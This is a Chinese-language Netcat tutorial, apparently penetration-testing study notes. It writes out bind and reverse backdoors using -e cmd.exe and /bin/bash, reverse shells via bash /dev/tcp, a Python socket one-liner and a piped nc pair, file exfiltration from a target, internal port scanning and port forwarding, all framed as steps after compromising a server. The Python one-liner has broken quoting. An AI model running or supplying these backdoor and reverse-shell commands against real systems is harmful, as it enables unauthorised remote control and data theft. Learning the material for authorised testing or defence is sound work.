Netcat工具

Netcat使用

 一、基础使用方法：
     1、创建一个服务器端方法：-nc -l -p [localport]
        例：nc64.exe -l -p 4444(端口号)
     2、创建一个客户端方法(连接服务端)：-nc [remote_addr] [remoteport]
        例：nc 192.168.43.106 4444
 二、返回shell的使用
     1、创建一个服务器端方法：-nc -l -p [localport] -e cmd.exe
        例：nc64.exe -l -p 4444(端口号)
     2、创建一个客户端方法(连接服务端)：-nc [remote_addr] [remoteport]
 三、文件传输的使用方法
     使用场景：
     （1）取证
          当目标机器被黑客攻击之后，取证人员可以利用nc的文件传输功能来获取目标机
          器上的文件内容。避免直接在目标机器上进行操作造成取证的误差。
     （2）单纯获取目标机器敏感文件
          当目标机器上有一些文件内容，无法正常下载时，可以利用nc进行文件传输。
     （3）为什么可以直接利用nc进行文件传输呢?
          nc中的数据传输使用的是标准的输入、输出流，所以可以直接利用命令行来进行操作。

     1、实现客户端向服务器端传输文件
     （1）创建一个服务器端方法：-nc -l -p [localport] > outfile
          nc -l -p 4444 >outfile.txt
     （2）创建一个客户端方法：-nc [remote_addr] [remoteport] < infile
          nc 192.168.43.106 4444 < C:\Users\Administrator\Desktop\lxm.txt
     2、实现服务器端向客户端传输文件
     （1）创建一个服务器端方法：-nc -l -p [localport] < infile
     （2）创建一个客户端方法：-nc [remote_addr] [remoteport] > outfile
     3、设置等待时间
       如果此时服务器端没有准备好连接，而客户端已经使用nc进行连接，那么客户端
       会一直等待下去，直到连接上服务器，造成一种假死状态。
       解决方法：设置等待时间
       -nc -w3 [ip] [port] 设置等待3秒钟，超过3秒，客户端直接关闭等待连接。
 四、端口扫描的使用方法
     使用场景
     （1）目标内网的扫描
          当获得目标权限之后，如果目标没有任何途径可以对内网进行探测，但此
          时刚好具有一个netcat的话，就可以使用netcat进行内网ip和端口的扫描。
     （2）单纯对某个目标进行端口探测
          当手头没有任何探测工具可以使用netcat进行端口探测。
     （3）对目标的服务banner进行抓取通过netcat对目标端口进行探测。

     1、-nc -v -n -z -w1 [target_ip] [start_target_port-stop_target_port]（1-100或者8080,443）
        -v 表示对错误进行详细输出
        -n 不对目标机器进行DNS解析
        -z zero I/O模式，专用于端口扫描。表示对目标IP发送数据表中不包含任何
           payload，这样做可以加快扫描的速度。
        -w 超时时间设置为1秒
     2、Banner抓取使用方法
        -echo "" | -nc -v -n -z -w1 [target_ip] [start_target_port-stop_target_port]
 五、Netcat建立后门
     使用场景
    （1）获取目标的命令执行权限
         当获取了目标服务器的低权限，并没有获得命令执行权限时，可以使用Netcat来实现权限提升，
         通过标机器上存在netcat，使用netcat建立后门,实现执行目标命令的功能。
    （2）为什么可以使用netcat建立后门,并返回操作结果?
         原理: netcat-切数据时通过标准输入/输出流实现的， 所以可以利用netcat的命令行
         进行后门]建立，并传输结果信息。
    1、Windows建立后门的使用方法
     （1）监听型后门
      -nc -l -p [port] -e cmd.exe
      例：nc64.exe -l -p 4444 -e cmd.exe
     （2）连接型后门
      -nc [remote_ip] [remote_port] -e cmd.exe
      例：nc64.exe 192.168.43.106 4444 -e cmd.exe
    2、Linux建立后门的使用方法
     （1）监听型后门
      -nc -l -p 4444 -e /bin/bash
     （2）连接型后门
      -nc [remote] [remote_port] -e /bin/bash
 六、命令参数
      -nc -h 查看命令参数
          -d 脱离命令窗口，在后台运行，常用于后门建立过程。
             nc64.exe -l dp -d 4444
          -e   执行某个程序，常用于后门建立过程。
          -G gateway 设置网关，常用于突破内网限制
          -g num 路由跳数
          -i sec 设置发送每一行数据的时间间隔
          -l 设置netcat处于监听状态等待连接
          -L 设置netcat处于监听状态等待连接，当客户端断开，服务器依旧回到等待状态。
          -n 设置netcat只识别ip地址，不进行DNS解析。    
          -o file 设置传输十六进制的数据
          -p 设置本地监听的端口号
          -r 设置netcat随机化端口号    
          -s addr 设置netcat源地址
          -t 回复telnet的请求数据包
          -u 设置netcat使用UDP模式
          -v 显示错误提示信息
          -w secs 设置连接超时秒数
          -z zero I/O模式，专用于端口扫描。表示对目标IP发送数据表中不包含任何
           payload，这样做可以加快扫描的速度。
 七、连接转发
     应用场景：突破某些特殊情况下的连接限制，以及处理一些特殊情况。
              （内网和外网的连接限制）

    
    

     1、echo nc [target] [port] >delay.bat
     2、nc -l -p [localport] -e delay.bat
     当有客户端连接到该服务端时，连接的客户端和通过服务端连接到target port上
     实现了连接转发功能。（端口转发）
     例子：（1）netcat -l -p 4444 （192.168.146.128）
           （2）nc64.exe 192.168.146.128 4444 (delay.bat批处理文件)
           （3）nc64.exe -l -p 4445 -e delay.bat
           （4）nc 192.168.1.105 4445 （192.168.1.100）
 八、Netcat反弹shell（Bash）
     应用场景：拿到某些服务器权限之后，想设置一个反弹shell。但目标服务器上没有
               安装Netcat时。

   
     反弹shell命令：bash -i >& /dev/tcp/ip/port 0>&1 （服务器端）
     PC接收Netcat命令：nc -lvp port                  （PC端）
     
     例子:PC端(192.168.1.100)：nc64.exe -lvp 4445
          服务器端：bash -i >& /dev/tcp/192.168.1.100/4445 0>&1
     解释：-lvp   
           -l：启动监听模式
           -v：详细输出
           -p：指定对应监听端口
     解释：bash -i >& /dev/tcp/ip/port 0>&1
           bash -i：表示以交互模式运行bash shell
                >&：重定向符，如果在其后加文件描述符，是将bash -i 交互模式传递
                    给文件描述符，而其后是文件，则将bash -i 交互模式传递给文件。
                    /dev/tcp/ip/port表示传递给远程主机的IP地址对应的端口。
           文件描述符：0标准输入、1标准输出、2错误输入输出
           命令中的0>&1表示将标准输入重定向到标准输出，实现远程输入可以在远程输
           出的对应内容。
 九、Netcat反弹shell（Python）
     应用场景：拿到某些服务器权限之后，想要设置一个反弹shell。但是目标服务器上
               没有安装Netcat时。但是安装了Python。

               
     反弹shell命令:
     python -c " import
     os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
     s.connect(('ip:,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
     os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    （服务器端）
     PC接收Netcat命令: nc -lvp port（PC端）
     例子:PC端(192.168.1.100)：nc64.exe -lvp 4445
     服务器端：
     python -c " import
     os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
     s.connect(('192.168.1.100:,4445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
     os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"    
     命令解释介绍：1、首先使用socket与远程建立起连接，具有了远程的文件描述符3。可
                   以使用s.fileno()来查看具体套接字建立的远程文件描述符。
                   2、os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远
                   程，使用os的subprocess在本地开启一个子进程，传入参数"-i”
                   使bash以交互模式启动，标准输入、标准输出、标准错误输出又被
                   重定向到了远程，这样就可以实现反弹shell。
 十、Netcat反弹shell（不支持Nc -e）
     应用场景：拿到某些服务器权限之后，想要设置一个反弹shell。当时配置原因不支持
               -e参数。

    
     反弹shell命令：nc ip port | /bin/bash | nc ip port （服务器端）
     PC接收Netcat命令: nc -lvp port  需要启动两个监听端口（PC端）

     例子：PC端(192.168.1.100)：nc64.exe -lvp 4445
                                nc64.exe -lvp 4446
     命令解释：在攻击测试机器上开启两个NC进行监听端，其中一个作为输入，一个作为输出。
     目标机器上 使用管道来重新定向输入输出。